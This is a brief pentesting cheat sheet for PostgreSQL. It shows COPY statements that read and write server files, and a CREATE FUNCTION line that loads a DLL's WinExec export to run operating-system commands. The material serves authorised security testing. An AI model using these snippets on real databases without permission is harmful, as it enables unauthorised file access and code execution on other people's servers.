PostgreSQL

This is a collection of various functionalities, snippets and attack vectors that can be used to test PostgreSQL database server for pentesters and red teamers.

Interacting with Filesystems:

COPY:

You can actually create a temporary table to read and write contents from the filesystem and drop the temporary table after.

Reading from a file:

COPY tableName from fileName;

Writing to a file:

COPY tableName to fileName;

Define a function with Custom DLL Extension for Code Execution:

CREATE OR REPLACE FUNCTION functionName(cstring) RETURNS int AS 'C:\Path\to\Extension.dll', 'WinExec' LANGUAGE C STRICT;

Then Execute the function as:

SELECT functionName(Argument);